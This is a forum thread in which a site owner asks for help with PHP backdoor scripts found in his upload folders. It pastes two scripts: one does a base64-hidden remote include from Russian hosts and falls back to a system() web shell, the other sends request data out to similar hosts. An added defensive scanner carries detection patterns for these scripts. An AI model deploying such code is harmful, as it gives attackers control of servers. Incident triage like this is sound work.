Alex
ZEQ2 Effects Programmer
|
Thursday, May 04, 2006
I just found a dozen or two of these scripts on my website in loads of folders, they seem to be including something off a remote russian site and running a system command, but I have no idea where they came from or how they arrived on my site. Any ideas? They seem to be in practically every folder which a php script can upload to (be it invision's uploads or archive folders, my scripts' upload folders, any which has write access) and they come in pairs. Not to mention I also found a file manager script and a system command executor script sitting unprotected in the root of public_html. I've cleared out all the ones I can find and removed write permissions from everything, though any suggestions as to what it's all about, how it was done, or anything? Cheers.
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @ include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%you", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){ system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".". base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>
|
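A defender-side triage scanner, added here as an example and not taken from the thread: it walks a web root for PHP files carrying the indicators visible in the two scripts above (a remote include whose URL is hidden in base64, a shell call fed straight from a request parameter, backtick execution, silenced errors) and decodes the base64 literals offline so the hidden hosts can be read without ever contacting them. The sample files, the `bad.example.invalid` host and every function name are constructed for the example.

```python
"""Scan a web root for PHP files carrying the indicators seen in this thread."""
import base64
import re
import tempfile
from pathlib import Path

# Indicators drawn from the two scripts quoted above.
INDICATORS = {
    "remote_include_b64": re.compile(r"\binclude(?:_once)?\s*\(\s*base64_decode\s*\(", re.I),
    "shell_from_request": re.compile(r"\b(?:system|exec|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST)\b", re.I),
    "backtick_exec": re.compile(r"`[^`\n]+`"),
    "errors_silenced": re.compile(r"error_reporting\s*\(\s*0\s*\)", re.I),
}
STRONG = {"remote_include_b64", "shell_from_request"}  # either one alone flags the file
B64_LITERAL = re.compile(r'base64_decode\s*\(\s*"([A-Za-z0-9+/=]+)"\s*\)')

def decode_literals(src):
    """Decode base64 string literals offline so the analyst can read the hidden hosts."""
    out = []
    for lit in B64_LITERAL.findall(src):
        try:
            text = base64.b64decode(lit, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            out.append(text)
    return out

def scan_file(path):
    src = Path(path).read_text(errors="replace")
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    return {"path": str(path), "indicators": hits, "decoded": decode_literals(src),
            "suspicious": bool(STRONG & set(hits))}

def scan_tree(root):
    """Report every .php file under root that carries at least one strong indicator."""
    return [r for r in (scan_file(p) for p in sorted(Path(root).rglob("*.php"))) if r["suspicious"]]

# Constructed samples: one benign file and one shaped like the first script in the thread.
# "aHR0cDovLw==" is the thread's own literal; the host literal is a constructed placeholder.
SAMPLES = {
    "index.php": '<?php echo "hello"; ?>',
    "uploads/cache.php": ('<?php error_reporting(0); if(! @ include_once(base64_decode("aHR0cDovLw==")'
                          '.base64_decode("YmFkLmV4YW1wbGUuaW52YWxpZA==")."/m.php")){'
                          'if(isset($_GET["k"])){ system($_GET["k"]);} print `uname -a`; } ?>'),
}

def demo():
    """Write the constructed samples to a temp dir and return the scan report."""
    root = Path(tempfile.mkdtemp())
    for rel, body in SAMPLES.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return scan_tree(root)
```

Point `scan_tree()` at the real document root to list the dropped files with their decoded remote hosts; the hits give you the strings to search the rest of the tree and the web server logs for.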
RiO
|
Friday, May 05, 2006
Looks like your typical webserver being hacked by a bunch of Russians. Probably used some kind of exploit to upload a file through which to get further control and upload the rest of the gunk. This stuff just happens to some people sometimes.
If I'd wager a guess I'd say it is designed to remotely link to, or redirect to, another hacked site from which an exploit is run.
|
Ussj_gohan
|
Saturday, May 06, 2006
RiO wrote : Looks like your typical webserver being hacked by a bunch of Russians.
How do you know that they were Russians?
|
zane
|
Saturday, May 06, 2006
gohan..
they seem to be including something off a remote russian site and running a system command
|
Morpherex
|
Monday, May 08, 2006
Google Entry
Moderator : Fixed URL Wrapping
|
Alex
ZEQ2 Effects Programmer
|
Monday, May 08, 2006
Now why didn't I think of googling the base64 string?
Morph, you rock, third result was a blog post describing it exactly. Apparently there's also .htaccess files which forward 404 errors to those scripts, so I'm going to go clean them up now. Thanks again, guys.
Edit: If anyone's interested, here's a couple of articles on the exploit:
Article 1
Article 2
Edit2: And more info
|